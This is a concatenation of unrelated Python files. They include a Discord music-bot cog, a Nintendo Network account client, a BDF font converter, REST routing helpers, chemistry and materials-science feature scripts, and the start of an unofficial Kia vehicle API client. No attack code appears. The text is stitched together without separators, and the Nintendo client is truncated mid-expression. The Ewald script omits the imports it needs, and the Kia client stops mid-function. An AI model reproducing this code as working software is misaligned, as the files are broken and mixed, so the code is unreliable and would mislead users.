on_voice_state_update(self, member, before, after): if not member.bot and after.channel is None: if not [m for m in before.channel.members if not m.bot]: await self.get_player(member.guild).teardown() 
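# The voice-state listener above tears the player down automatically once the last
# non-bot member has left the voice channel the bot was playing in.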
@wavelink.WavelinkMixin.listener() async def on_node_ready(self, node): print(f" Wavelink node `{node.identifier}` ready.") @wavelink.WavelinkMixin.listener("on_track_stuck") @wavelink.WavelinkMixin.listener("on_track_end") @wavelink.WavelinkMixin.listener("on_track_exception") async def on_player_stop(self, _: wavelink.Node, payload: Any): if payload.player.queue.repeat_mode == RepeatMode.ONE: await payload.player.repeat_track() else: await payload.player.advance() async def cog_check(self, ctx: commands.Context): if isinstance(ctx.channel, discord.DMChannel): await ctx.send("Music commands are not available in DMs.") return False return True def get_player(self, obj: Union[discord.Guild, commands.Context]): if isinstance(obj, commands.Context): return self.wavelink.get_player(obj.guild.id, cls=Player, context=obj) elif isinstance(obj, discord.Guild): return self.wavelink.get_player(obj.id, cls=Player) @commands.command(name="connect", aliases=["join"]) async def connect_command( self, ctx: commands.Context, *, channel: Optional[discord.VoiceChannel] ): player = self.get_player(ctx) channel = await player.connect(ctx, channel) await ctx.send(f"Connected to {channel.name}.") @commands.command(name="disconnect", aliases=["leave", "fuckoff"]) async def disconnect_command(self, ctx: commands.Context): player = self.get_player(ctx) await player.teardown() await ctx.send("Disconnected.") @commands.command(name="play", aliases=["p"]) async def play_command(self, ctx: commands.Context, *, query: Optional[str]): player: Player = self.get_player(ctx) if not player.is_connected: await player.connect(ctx) if query is None: if player.queue.is_empty: raise QueueIsEmpty() await player.set_pause(False) await ctx.send("Playback resumed.") else: query = query.strip("<>") if not URL_REGEX.match(query): query = f"ytsearch:{query}" await player.add_tracks(ctx, await self.wavelink.get_tracks(query)) @commands.command(name="pause") async def pause_command(self, ctx: commands.Context): player = self.get_player(ctx) if player.is_paused: raise PlayerIsAlreadyPaused() await player.set_pause(True) await ctx.send("Playback paused.") @commands.command(name="stop") async def stop_command(self, ctx: commands.Context): player = self.get_player(ctx) player.queue.empty() await player.stop() await ctx.send("Playback stopped.") @commands.command(name="next", aliases=["skip"]) async def next_command(self, ctx: commands.Context): player = self.get_player(ctx) if not player.queue.upcoming: raise NoMoreTracks() await player.stop() await ctx.send("Playing next track in queue.") @commands.command(name="previous") async def previous_command(self, ctx: commands.Context): player = self.get_player(ctx) if not player.queue.history: raise NoPreviousTracks() player.queue.position -= 2 await player.stop() await ctx.send("Playing previous track in queue.") @commands.command(name="shuffle") async def shuffle_command(self, ctx: commands.Context): player = self.get_player(ctx) player.queue.shuffle() await ctx.send("Queue shuffled.") @commands.command(name="repeat") async def repeat_command(self, ctx: commands.Context, mode: str): if mode not in RepeatMode: raise InvalidRepeatMode() player = self.get_player(ctx) player.queue.set_repeat_mode(mode) await ctx.send(f"The repeat mode has been set to {mode}.") @commands.command(name="queue") async def queue_command(self, ctx: commands.Context, show: Optional[int] = 10): player = self.get_player(ctx) if player.queue.is_empty: raise QueueIsEmpty embed = discord.Embed( title="Queue", 
description=f"Showing up to next {show} tracks", colour=ctx.author.colour, timestamp=dt.datetime.utcnow(), ) embed.set_author(name="Query Results") embed.set_footer( text=f"Requested by {ctx.author.display_name}", icon_url=ctx.author.avatar_url, ) embed.add_field( name="Currently playing", value=getattr( player.queue.current_track, "title", "No tracks currently playing." ), inline=False, ) if upcoming := player.queue.upcoming: embed.add_field( name="Next up", value="\n".join(t.title for t in upcoming[:show]), inline=False, ) await ctx.send(embed=embed) @commands.group(name="volume", invoke_without_command=True) async def volume_group(self, ctx: commands.Context, volume: int): player = self.get_player(ctx) if volume < 0: raise VolumeTooLow() if volume > 150: raise VolumeTooHigh() await player.set_volume(volume) await ctx.send(f"Volume set to {volume:,}%") @volume_group.command(name="up") async def volume_up_command(self, ctx: commands.Context): player = self.get_player(ctx) if player.volume == 150: raise MaxVolume() await player.set_volume(value := min(player.volume + 10, 150)) await ctx.send(f"Volume set to {value:,}%") @volume_group.command(name="down") async def volume_down_command(self, ctx: commands.Context): player = self.get_player(ctx) if player.volume == 0: raise MinVolume() await player.set_volume(value := max(0, player.volume - 10)) await ctx.send(f"Volume set to {value:,}%") @commands.command(name="lyrics") async def lyrics_command(self, ctx: commands.Context, name: Optional[str]): player = self.get_player(ctx) name = name or player.queue.current_track.title async with ctx.typing(): async with self.bot.session.get(LYRICS_URL + name) as r: if not 200 <= r.status <= 299: raise NoLyricsFound() data = await r.json() if len(data["lyrics"]) > 2000: return await ctx.send(f"<{data['links']['genius']}>") embed = discord.Embed( title=data["title"], description=data["lyrics"], colour=ctx.author.colour, timestamp=dt.datetime.utcnow(), ) embed.set_thumbnail(url=data["thumbnail"]["genius"]) embed.set_author(name=data["author"]) await ctx.send(embed=embed) @commands.command(name="eq") async def eq_command(self, ctx, preset: str): player = self.get_player(ctx) eq = getattr(wavelink.eqs.Equalizer, preset, None) if not eq: raise InvalidEQPreset() await player.set_eq(eq()) await ctx.send(f"Equaliser adjusted to the {preset} preset.") @commands.command(name="adveq", aliases=["aeq"]) async def adveq_command(self, ctx, band: int, gain: float): player = self.get_player(ctx) if not 1 <= band <= 15 and band not in HZ_BANDS: raise NonExistentEQBand if band > 15: band = HZ_BANDS.index(band) + 1 if abs(gain) > 10: raise EQGainOutOfBounds player.eq_levels[band - 1] = gain / 10 eq = wavelink.eqs.Equalizer( levels=[(i, gain) for i, gain in enumerate(player.eq_levels)] ) await player.set_eq(eq) await ctx.send("Equaliser adjusted.") @commands.command(name="playing", aliases=["np"]) async def playing_command(self, ctx): player = self.get_player(ctx) if not player.is_playing: raise PlayerIsAlreadyPaused embed = discord.Embed( title="Now playing", colour=ctx.author.colour, timestamp=dt.datetime.utcnow(), ) embed.set_author(name="Playback Information") embed.set_footer( text=f"Requested by {ctx.author.display_name}", icon_url=ctx.author.avatar_url, ) embed.add_field( name="Track title", value=player.queue.current_track.title, inline=False ) embed.add_field( name="Artist", value=player.queue.current_track.author, inline=False ) position = divmod(player.position, 60000) length = 
divmod(player.queue.current_track.length, 60000) embed.add_field( name="Position", value=f"{int(position[0])}:{round(position[1]/1000):02}/{int(length[0])}:{round(length[1]/1000):02}", inline=False, ) await ctx.send(embed=embed) @commands.command(name="skipto", aliases=["playindex"]) async def skipto_command(self, ctx, index: int): player = self.get_player(ctx) if player.queue.is_empty: raise QueueIsEmpty() if not 0 <= index <= player.queue.length: raise NoMoreTracks() player.queue.position = index - 2 await player.stop() await ctx.send(f"Playing track in position {index}.") @commands.command(name="restart") async def restart_command(self, ctx): player = self.get_player(ctx) if player.queue.is_empty: raise QueueIsEmpty() await player.seek(0) await ctx.send("Track restarted.") @commands.command(name="seek") async def seek_command(self, ctx, position: str): player = self.get_player(ctx) if player.queue.is_empty: raise QueueIsEmpty() if not (match := TIME_REGEX.match(position)): raise InvalidTimeString() if match.group(3): secs = (int(match.group(1)) * 60) + (int(match.group(3))) else: secs = int(match.group(1)) await player.seek(secs * 1000) await ctx.send("Seeked.") def setup(bot): bot.add_cog(Music(bot)) Cuyler36/NintendoClients from nintendo.miis import MiiData from bs4 import BeautifulSoup import pkg_resources import collections import requests import hashlib import base64 import struct import time import logging logger = logging.getLogger(__name__) CERT = pkg_resources.resource_filename("nintendo", "files/wiiu_common.crt") KEY = pkg_resources.resource_filename("nintendo", "files/wiiu_common.key") def calc_password_hash(pid, password): data = struct.pack("> 8) self.headers["X-Nintendo-Application-Version"] = "%04X" %application_version def get_access_token(self): if time.time() >= self.refresh_time: self.refresh_login() return self.access_token def login(self, username, password, hash=False): data = { "grant_type": "password", "user_id": username, "password": password } if hash: data["password_type"] = "hash" request = Request(self) response = request.post( "oauth20/access_token/generate", data = data ) self.access_token = response.oauth20.access_token.token.text self.refresh_token = response.oauth20.access_token.refresh_token.text self.refresh_time = time.time() + int(response.oauth20.access_token.expires_in.text) def refresh_login(self): request = Request(self) response = request.post( "oauth20/access_token/generate", data = { "grant_type": "refresh_token", "refresh_token": self.refresh_token } ) self.access_token = response.oauth20.access_token.token.text self.refresh_token = response.oauth20.access_token.refresh_token.text self.refresh_time = time.time() + int(response.oauth20.access_token.expires_in.text) def get_emails(self): request = Request(self) request.auth(self.get_access_token()) response = request.get( "people/@me/emails" ) return [Email.parse(email) for email in response.emails] def get_profile(self): request = Request(self) request.auth(self.get_access_token()) response = request.get( "people/@me/profile" ) return Profile.parse(response.person) def get_nex_token(self, game_server_id): request = Request(self) request.auth(self.get_access_token()) response = request.get( "provider/nex_token/@me", params = { "game_server_id": "%08X" %game_server_id } ) return NexToken.parse(response.nex_token) #The following functions can be used without logging in first def validate_email(self, email): request = Request(self) request.post( "support/validate/email", data = {"email": email} ) 
#An error is thrown if validation fails def get_miis(self, pids): request = Request(self) response = request.get( "miis", params = { "pids": ",".join([str(pid) for pid in pids]) } ) return [Mii.parse(mii) for mii in response.miis] def get_mii(self, pid): return self.get_miis([pid])[0] def get_pids(self, nnids): request = Request(self) response = request.get( "admin/mapped_ids", params = { "input_type": "user_id", "output_type": "pid", "input": ",".join(nnids) } ) return {id.in_id.text: int(id.out_id.text) for id in response.mapped_ids} def get_nnids(self, pids): request = Request(self) response = request.get( "admin/mapped_ids", params = { "input_type": "pid", "output_type": "user_id", "input": ",".join([str(pid) for pid in pids]) } ) return {int(id.in_id.text): id.out_id.text for id in response.mapped_ids} def get_pid(self, nnid): return self.get_pids([nnid])[nnid] def get_nnid(self, pid): return self.get_nnids([pid])[pid] def get_time_zones(self, country, language): request = Request(self) response = request.get( "content/time_zones/%s/%s" %(country, language) ) return [TimeZone.parse(tz) for tz in response.timezones] #!/usr/bin/env python # # Copyright (c) 2014 Nutanix, Inc. # # Permission is hereby granted, free of charge, to any person obtaining a copy # of this software and associated documentation files (the "Software"), to deal # in the Software without restriction, including without limitation the rights # to use, copy, modify, merge, publish, distribute, sublicense, and/or sell # copies of the Software, and to permit persons to whom the Software is # furnished to do so, subject to the following conditions: # # The above copyright notice and this permission notice shall be included in # all copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR # IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, # FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE # AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER # LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, # OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN # THE SOFTWARE. # # Converts a BDF bitmap font to C header file so it can be embedded into C # programs. 
# # Usage: # # bdf_to_c.py < in.bdf > out.h # import sys fontmap = {} cur_char = None in_bitmap = False font_width = None font_height = None for line in sys.stdin: parts = line.split() if cur_char is None and parts[0] == "FONTBOUNDINGBOX": font_width = int(parts[1]) font_height = int(parts[2]) if font_width <= 8: font_bit_width = 8 elif font_width <= 16: font_bit_width = 16 elif font_width <= 32: font_bit_width = 32 else: assert False, "Font too wide" if cur_char is None and parts[0] == "ENCODING": cur_char = [] fontmap[int(parts[1])] = cur_char elif cur_char is not None and parts[0] == "BITMAP": in_bitmap = True elif in_bitmap and parts[0] == "ENDCHAR": cur_char = None in_bitmap = False elif in_bitmap: cur_char.append(int(parts[0], 16)) sys.stdout.write("#define FONT_X_RES %d\n" % font_width) sys.stdout.write("#define FONT_Y_RES %d\n" % font_height) sys.stdout.write("static const u%d FONT_BITMAP[][%d] = {\n" % (font_bit_width, font_height)) def bit_flip(x): r = 0 for _ in xrange(font_bit_width): r = (r << 1) | (x & 1) x >>= 1 return r for x in xrange(128): bitmap = fontmap.get(x, []) sys.stdout.write(" /* code point %x */\n" % x) sys.stdout.write(" {\n") for row in bitmap: sys.stdout.write(" 0x%x,\n" % bit_flip(row)) sys.stdout.write(" },\n") sys.stdout.write("};\n") from .decorators import decoratormethod class HTTPMethodsMixIn(): """convenience methods for .route()""" @decoratormethod def get(self, *args, **kwargs): return self.route(*args, methods=['GET'], **kwargs) @decoratormethod def post(self, *args, **kwargs): return self.route(*args, methods=['POST'], **kwargs) @decoratormethod def put(self, *args, **kwargs): return self.route(*args, methods=['PUT'], **kwargs) @decoratormethod def delete(self, *args, **kwargs): return self.route(*args, methods=['DELETE'], **kwargs) @decoratormethod def patch(self, *args, **kwargs): return self.route(*args, methods=['PATCH'], **kwargs) @decoratormethod def options(self, *args, **kwargs): return self.route(*args, methods=['OPTIONS'], **kwargs) class RESTFulRoutesMixIn(HTTPMethodsMixIn): """convenience methods for .route() https://medium.com/@shubhangirajagrawal/the-7-restful-routes-a8e84201f206 https://gist.github.com/alexpchin/09939db6f81d654af06b """ resource_id = '' @decoratormethod def index(self, endpoint, *paths, **kwargs): "display a list of this resource" return self.get(endpoint, *paths or [''], **kwargs) @decoratormethod def new(self, endpoint, *paths, **kwargs): "show a form to create this resource" for path in paths or ['']: self.get(endpoint, f'new{path}', **kwargs) return endpoint @decoratormethod def create(self, endpoint, *paths, **kwargs): "add a new resource to database, then redirect" return self.post(endpoint, *paths or [''], **kwargs) @decoratormethod def show(self, endpoint, *paths, **kwargs): "show info about one resource" for path in paths or ['']: self.get(endpoint, f'/{self.resource_id}{path}', **kwargs) return endpoint @decoratormethod def edit(self, endpoint, *paths, **kwargs): "show a form to edit one resource" for path in paths or ['']: self.get(endpoint, f'/{self.resource_id}/edit{path}', **kwargs) return endpoint @decoratormethod def update(self, endpoint, *paths, **kwargs): "update a particular resource, then redirect" for path in paths or ['']: self.route(endpoint, f'/{self.resource_id}{path}', methods=['PATCH', 'PUT'], **kwargs) return endpoint @decoratormethod def destroy(self, endpoint, *paths, **kwargs): "delete a particular resource, then redirect" for path in paths or ['']: self.delete(endpoint, 
f'/{self.resource_id}{path}', **kwargs) return endpoint sergicollado/json_redo0 class BadParametersError(Exception): def __init__(self, class_name: str, required_params: list, data: dict): self.message = f'{class_name} params: {" - ".join(required_params)} not found, data: {data}' super().__init__(self.message) def __str__(self): return self.message 0 import pyactus def test_version_of_library(): assert pyactus.__version__ == "0.0.0" 1-10 # coding: utf-8 ''' This function read_struct_get_ewald(df,df_name) reads structure file where df=train/test and output Ewald energies. ''' class Atom: # Equality epsilon ee = 1e-6 def __init__(self, x=0.0, y=0.0, z=0.0, t="", c=0): self.x = x self.y = y self.z = z self.t = t self.c = c def read_geometry_file(path_to_file): with open(path_to_file) as f: lines = f.readlines() vec_x = lines[3].split() vec_y = lines[4].split() vec_z = lines[5].split() vec_x = [float(vec_x[i]) for i in range(1, len(vec_x))] vec_y = [float(vec_y[i]) for i in range(1, len(vec_y))] vec_z = [float(vec_z[i]) for i in range(1, len(vec_z))] ga_charge = periodic_table.Element['Ga'].Z # 31.0 al_charge = periodic_table.Element['Al'].Z # 13.0 in_charge = periodic_table.Element['In'].Z # 49.0 o_charge = periodic_table.Element['O'].Z # 8.0 vectors = [vec_x, vec_y, vec_z] uc_atoms = [] for i in range(6, len(lines)): sl = lines[i].split() x = float(sl[1]) y = float(sl[2]) z = float(sl[3]) t = sl[4] if sl[4] == "Ga": c = ga_charge elif sl[4] == "Al": c = al_charge elif sl[4] == "In": c = in_charge elif sl[4] == "O": c = o_charge a = Atom(x, y, z, t, c) uc_atoms.append(a) return vectors, uc_atoms def convert_uc_atoms_to_input_for_pymatgen(uc_atoms): n = len(uc_atoms) atom_coords = [] atom_labels = [] charge_list = [] for i in range(n): x = uc_atoms[i].x y = uc_atoms[i].y z = uc_atoms[i].z t = uc_atoms[i].t c = uc_atoms[i].c vec = [x, y, z] atom_coords.append(vec) atom_labels.append(t) charge_list.append(c) site_properties = {"charge": charge_list} return atom_coords, atom_labels, site_properties def read_struct_get_ewald(df,df_name): r_ene = [] k_ene = [] p_ene = [] eta = [] for i in range(len(df)): filename = str(str(df_name)+'/'+str(i+1)+'/geometry.xyz') vectors, uc_atoms = read_geometry_file(filename) atom_coords, atom_labels, site_properties = convert_uc_atoms_to_input_for_pymatgen(uc_atoms) lattice = Lattice.from_parameters(a=df.lattice_vector_1_ang[i], b=df.lattice_vector_2_ang[i], c=df.lattice_vector_3_ang[i], alpha=df.lattice_angle_alpha_degree[i], beta=df.lattice_angle_beta_degree[i], gamma=df.lattice_angle_gamma_degree[i]) structure = Structure(lattice, atom_labels, atom_coords, site_properties=site_properties) ewald_sum = ewald.EwaldSummation(structure) r_ene.append(ewald_sum.real_space_energy) k_ene.append(ewald_sum.reciprocal_space_energy) p_ene.append(ewald_sum.point_energy) eta.append(ewald_sum.eta) df['r_ene'] = pd.DataFrame(r_ene) df['k_ene'] = pd.DataFrame(k_ene) df['p_ene'] = pd.DataFrame(p_ene) df['eta'] = pd.DataFrame(eta) return df['r_ene'], df['k_ene'], df['p_ene'], df['eta'] import os import argparse import numpy as np import pandas as pd from tqdm import tqdm from rdkit.Chem import AllChem from ogb.graphproppred import GraphPropPredDataset def getmorganfingerprint(mol): return list(AllChem.GetMorganFingerprintAsBitVect(mol, 2)) def getmaccsfingerprint(mol): fp = AllChem.GetMACCSKeysFingerprint(mol) return [int(b) for b in fp.ToBitString()] def main(dataset_name): dataset = GraphPropPredDataset(name=dataset_name) df_smi = 
pd.read_csv(f"dataset/{dataset_name}/mapping/mol.csv.gz".replace("-", "_")) smiles = df_smi["smiles"] mgf_feat_list = [] maccs_feat_list = [] for ii in tqdm(range(len(smiles))): rdkit_mol = AllChem.MolFromSmiles(smiles.iloc[ii]) mgf = getmorganfingerprint(rdkit_mol) mgf_feat_list.append(mgf) maccs = getmaccsfingerprint(rdkit_mol) maccs_feat_list.append(maccs) mgf_feat = np.array(mgf_feat_list, dtype="int64") maccs_feat = np.array(maccs_feat_list, dtype="int64") print("morgan feature shape: ", mgf_feat.shape) print("maccs feature shape: ", maccs_feat.shape) save_path = f"./dataset/{dataset_name}".replace("-", "_") print("saving feature in %s" % save_path) np.save(os.path.join(save_path, "mgf_feat.npy"), mgf_feat) np.save(os.path.join(save_path, "maccs_feat.npy"), maccs_feat) if __name__=="__main__": parser = argparse.ArgumentParser(description='gnn') parser.add_argument("--dataset_name", type=str, default="ogbg-molhiv") args = parser.parse_args() main(args.dataset_name)hyundai_kia_connect_api/KiaUvoAPIUSA.py0 import logging import random import secrets import string import time from datetime import datetime, timedelta import datetime as dt import re import pytz import requests from requests import RequestException, Response from .const import DOMAIN, VEHICLE_LOCK_ACTION, TEMPERATURE_UNITS, DISTANCE_UNITS from .ApiImpl import ApiImpl, ClimateRequestOptions from .Token import Token from .Vehicle import Vehicle from .utils import get_child_value _LOGGER = logging.getLogger(__name__) class AuthError(RequestException): pass def request_with_active_session(func): def request_with_active_session_wrapper(*args, **kwargs): try: return func(*args, **kwargs) except AuthError: _LOGGER.debug(f"got invalid session, attempting to repair and resend") self = args[0] token = kwargs["token"] vehicle = kwargs["vehicle"] new_token = self.login(token.username, token.password) _LOGGER.debug( f"old token:{token.access_token}, new token:{new_token.access_token}" ) token.access_token = new_token.access_token token.valid_until = new_token.valid_until json_body = kwargs.get("json_body", None) if json_body is not None and json_body.get("vinKey", None): json_body["vinKey"] = [vehicle.key] response = func(*args, **kwargs) return response return request_with_active_session_wrapper def request_with_logging(func): def request_with_logging_wrapper(*args, **kwargs): url = kwargs["url"] json_body = kwargs.get("json_body") if json_body is not None: _LOGGER.debug(f"sending {url} request with {json_body}") else: _LOGGER.debug(f"sending {url} request") response = func(*args, **kwargs) _LOGGER.debug(f"got response {response.text}") response_json = response.json() if response_json["status"]["statusCode"] == 0: return response if ( response_json["status"]["statusCode"] == 1 and response_json["status"]["errorType"] == 1 and response_json["status"]["errorCode"] == 1003 ): _LOGGER.debug(f"error: session invalid") raise AuthError _LOGGER.error(f"error: unknown error response {response.text}") raise RequestException return request_with_logging_wrapper class KiaUvoAPIUSA(ApiImpl): def __init__( self, region: int, brand: int, ) -> None: self.temperature_range = range(62, 82) # Randomly generate a plausible device id on startup self.device_id = ( "".join( random.choice(string.ascii_letters + string.digits) for _ in range(22) ) + ":" + secrets.token_urlsafe(105) ) self.BASE_URL: str = "api.owners.kia.com" self.API_URL: str = "https://" + self.BASE_URL + "/apigw/v1/" def api_headers(self) -> dict: offset = time.localtime().tm_gmtoff / 60 / 60 
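        # Static headers sent to the api.owners.kia.com gateway on every request;
        # "offset" is the local UTC offset in whole hours, and the date and
        # deviceid headers are filled in just below the dict.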
headers = { "content-type": "application/json;charset=UTF-8", "accept": "application/json, text/plain, */*", "accept-encoding": "gzip, deflate, br", "accept-language": "en-US,en;q=0.9", "apptype": "L", "appversion": "4.10.0", "clientid": "MWAMOBILE", "from": "SPA", "host": self.BASE_URL, "language": "0", "offset": str(int(offset)), "ostype": "Android", "osversion": "11", "secretkey": "", "to": "APIGW", "tokentype": "G", "user-agent": "okhttp/3.12.1", } # should produce something like "Mon, 18 Oct 2021 07:06:26 GMT". May require adjusting locale to en_US date = datetime.now(tz=pytz.utc).strftime("%a, %d %b %Y %H:%M:%S GMT") headers["date"] = date headers["deviceid"] = self.device_id return headers def authed_api_headers(self, token: Token, vehicle: Vehicle): headers = self.api_headers() headers["sid"] = token.access_token headers["vinkey"] = vehicle.key return headers @request_with_active_session @request_with_logging def post_request_with_logging_and_active_session( self, token: Token, url: str, json_body: dict, vehicle: Vehicle ) -> Response: headers = self.authed_api_headers(token, vehicle) return requests.post(url, json=json_body, headers=headers) @request_with_active_session @request_with_logging def get_request_with_logging_and_active_session( self, token: Token, url: str, vehicle: Vehicle ) -> Response: headers = self.authed_api_headers(token, vehicle) return requests.get(url, headers=headers) def login(self, username: str, password: str) -> Token: """Login into cloud endpoints and return Token""" url = self.API_URL + "prof/authUser" data = { "deviceKey": "", "deviceType": 2, "userCredential": {"userId": username, "password": password}, } headers = self.api_headers() response = requests.post(url, json=data, headers=headers) _LOGGER.debug(f"{DOMAIN} - Sign In Response {response.text}") session_id = response.headers.get("sid") if not session_id: raise Exception( f"no session id returned in login. Response: {response.text} headers {response.headers} cookies {response.cookies}" ) _LOGGER.debug(f"got session id {session_id}") valid_until = dt.datetime.now(pytz.utc) + dt.timedelta(hours=1) return Token( username=username, password=password, access_token=session_id, valid_until=valid_until, ) def get_vehicles(self, token: Token) -> list[Vehicle]: """Return all Vehicle instances for a given Token""" url = self.API_URL + "ownr/gvl" headers = self.api_headers() headers["sid"] = token.access_token response = requests.get(url, headers=headers) _LOGGER.debug(f"{DOMAIN} - Get Vehicles Response {response.text}") response = response.json() result = [] for entry in response["payload"]["vehicleSummary"]: vehicle: Vehicle = Vehicle( id=entry["vehicleIdentifier"], name=entry["nickName"], model=entry["modelName"], key=entry["vehicleKey"], ) result.append(vehicle) return result def refresh_vehicles(self, token: Token, vehicles: list[Vehicle]) -> None: """Refresh the vehicle data provided in get_vehicles. 
Required for Kia USA as key is session specific""" url = self.API_URL + "ownr/gvl" headers = self.api_headers() headers["sid"] = token.access_token response = requests.get(url, headers=headers) _LOGGER.debug(f"{DOMAIN} - Get Vehicles Response {response.text}") response = response.json() for entry in response["payload"]["vehicleSummary"]: if vehicles[entry["vehicleIdentifier"]]: vehicles[entry["vehicleIdentifier"]].name=entry["nickName"] vehicles[entry["vehicleIdentifier"]].model=entry["modelName"] vehicles[entry["vehicleIdentifier"]].key=entry["vehicleKey"] else: vehicle: Vehicle = Vehicle( id=entry["vehicleIdentifier"], name=entry["nickName"], model=entry["modelName"], key=entry["vehicleKey"], ) vehicles.append(vehicle) def update_vehicle_with_cached_state(self, token: Token, vehicle: Vehicle) -> None: """Get cached vehicle data and update Vehicle instance with it""" state = self._get_cached_vehicle_state(token, vehicle) vehicle.last_updated_at = self.get_last_updated_at( get_child_value(state, "vehicleStatus.syncDate.utc") ) vehicle.total_driving_distance = ( get_child_value( state, "vehicleStatus.evStatus.drvDistance.0.rangeByFuel.totalAvailableRange.value", ), DISTANCE_UNITS[3], ) vehicle.odometer = ( get_child_value(state, "odometer.value"), DISTANCE_UNITS[3], ) vehicle.next_service_distance = ( get_child_value(state, "service.imatServiceOdometer"), DISTANCE_UNITS[3], ) vehicle.last_service_distance = ( get_child_value(state, "service.msopServiceOdometer"), DISTANCE_UNITS[3], ) vehicle.car_battery_percentage = get_child_value( state, "vehicleStatus.batteryStatus.stateOfCharge" ) vehicle.engine_is_running = get_child_value(state, "vehicleStatus.engine") vehicle.air_temperature = ( get_child_value(state, "vehicleStatus.airTemp.value"), TEMPERATURE_UNITS[1], ) vehicle.defrost_is_on = get_child_value(state, "vehicleStatus.defrost") vehicle.washer_fluid_warning_is_on = get_child_value(state, "vehicleStatus.washerFluidStatus") vehicle.smart_key_battery_warning_is_on = get_child_value(state, "vehicleStatus.smartKeyBatteryWarning") vehicle.tire_pressure_all_warning_is_on = get_child_value(state, "vehicleStatus.tirePressure.all") vehicle.steering_wheel_heater_is_on = get_child_value( state, "vehicleStatus.steerWheelHeat" ) vehicle.back_window_heater_is_on = get_child_value( state, "vehicleStatus.sideBackWindowHeat" ) vehicle.side_mirror_heater_is_on = get_child_value( state, "vehicleStatus.sideMirrorHeat" ) vehicle.front_left_seat_heater_is_on = get_child_value( state, "vehicleStatus.seatHeaterVentState.flSeatHeatState" ) vehicle.front_right_seat_heater_is_on = get_child_value( state, "vehicleStatus.seatHeaterVentState.frSeatHeatState" ) vehicle.rear_left_seat_heater_is_on = get_child_value( state, "vehicleStatus.seatHeaterVentState.rlSeatHeatState" ) vehicle.rear_right_seat_heater_is_on = get_child_value( state, "vehicleStatus.seatHeaterVentState.rrSeatHeatState" ) vehicle.is_locked = get_child_value(state, "vehicleStatus.doorLock") vehicle.front_left_door_is_open = get_child_value( state, "vehicleStatus.doorStatus.frontLeft" ) vehicle.front_right_door_is_open = get_child_value( state, "vehicleStatus.doorStatus.frontRight" ) vehicle.back_left_door_is_open = get_child_value( state, "vehicleStatus.doorStatus.backLeft" ) vehicle.back_right_door_is_open = get_child_value( state, "vehicleStatus.doorStatus.backRight" ) vehicle.hood_is_open = get_child_value(state, "vehicleStatus.doorStatus.hood") vehicle.trunk_is_open = get_child_value(state, "vehicleStatus.doorStatus.trunk") 
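        # EV-specific fields follow (battery percentage, charging/plug state, range
        # and charge-time estimates); they are read from vehicleStatus.evStatus,
        # which may be absent for non-EV vehicles.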
vehicle.ev_battery_percentage = get_child_value( state, "vehicleStatus.evStatus.batteryStatus" ) vehicle.ev_battery_is_charging = get_child_value( state, "vehicleStatus.evStatus.batteryCharge" ) vehicle.ev_battery_is_plugged_in = get_child_value( state, "vehicleStatus.evStatus.batteryPlugin" ) vehicle.ev_driving_distance = ( get_child_value( state, "vehicleStatus.evStatus.drvDistance.0.rangeByFuel.evModeRange.value", ), DISTANCE_UNITS[3], ) vehicle.ev_estimated_current_charge_duration = ( get_child_value(state, "vehicleStatus.evStatus.remainTime2.atc.value"), "m", ) vehicle.ev_estimated_fast_charge_duration = ( get_child_value(state, "vehicleStatus.evStatus.remainTime2.etc1.value"), "m", ) vehicle.ev_estimated_portable_charge_duration = ( get_child_value(state, "vehicleStatus.evStatus.remainTime2.etc2.value"), "m", ) vehicle.ev_estimated_station_charge_duration = ( get_child_value(state, "vehicleStatus.evStatus.remainTime2.etc3.value"), "m", ) vehicle.fuel_driving_distance = ( get_child_value( state, "vehicleStatus.distanceToEmpty.value", ), DISTANCE_UNITS[3], ) vehicle.fuel_level_is_low = get_child_value(state, "vehicleStatus.lowFuelLight") vehicle.fuel_level = get_child_value(state, "vehicleStatus.fuelLevel") vehicle.air_control_is_on = get_child_value(state, "vehicleStatus.airCtrlOn") vehicle.location = ( get_child_value(state, "vehicleLocation.coord.lat"), get_child_value(state, "vehicleLocation.coord.lon"), get_child_value(state, "vehicleLocation.syncDate.utc"), ) vehicle.next_service_distance = ( get_child_value(state, "nextService.value"), DISTANCE_UNITS[get_child_value(state, "nextService.unit")], ) vehicle.data = state def get_last_updated_at(self, value) -> dt.datetime: m = re.match(r"(\d{4})(\d{2})(\d{2})(\d{2})(\d{2})(\d{2})", value) _LOGGER.debug(f"{DOMAIN} - last_updated_at - before {value}") value = dt.datetime( year=int(m.group(1)), month=int(m.group(2)), day=int(m.group(3)), hour=int(m.group(4)), minute=int(m.group(5)), second=int(m.group(6)), tzinfo=self.data_timezone, ) _LOGGER.debug(f"{DOMAIN} - last_updated_at - after {value}") return value def _get_cached_vehicle_state(self, token: Token, vehicle: Vehicle) -> dict: url = self.API_URL + "cmm/gvi" body = { "vehicleConfigReq": { "airTempRange": "0", "maintenance": "1", "seatHeatCoolOption": "0", "vehicle": "1", "vehicleFeature": "0", }, "vehicleInfoReq": { "drivingActivty": "0", "dtc": "1", "enrollment": "1", "functionalCards": "0", "location": "1", "vehicleStatus": "1", "weather": "0", }, "vinKey": [vehicle.key], } response = self.post_request_with_logging_and_active_session( token=token, url=url, json_body=body, vehicle=vehicle ) response_body = response.json() vehicle_status = response_body["payload"]["vehicleInfoList"][0][ "lastVehicleInfo" ]["vehicleStatusRpt"]["vehicleStatus"] vehicle_data = { "vehicleStatus": vehicle_status, "odometer": { "value": float( response_body["payload"]["vehicleInfoList"][0]["vehicleConfig"][ "vehicleDetail" ]["vehicle"]["mileage"] ), "unit": 3, }, "nextService": { "value": float( response_body["payload"]["vehicleInfoList"][0]["vehicleConfig"][ "maintenance" ]["nextServiceMile"] ), "unit": 3, }, "vehicleLocation": response_body["payload"]["vehicleInfoList"][0][ "lastVehicleInfo" ]["location"], } if vehicle_status.get("evStatus"): vehicle_status["evStatus"]["remainTime2"] = { "atc": vehicle_status["evStatus"]["remainChargeTime"][0]["timeInterval"] } if vehicle_status.get("tirePressure"): vehicle_status["tirePressureLamp"] = { "tirePressureLampAll": vehicle_status["tirePressure"]["all"] } 
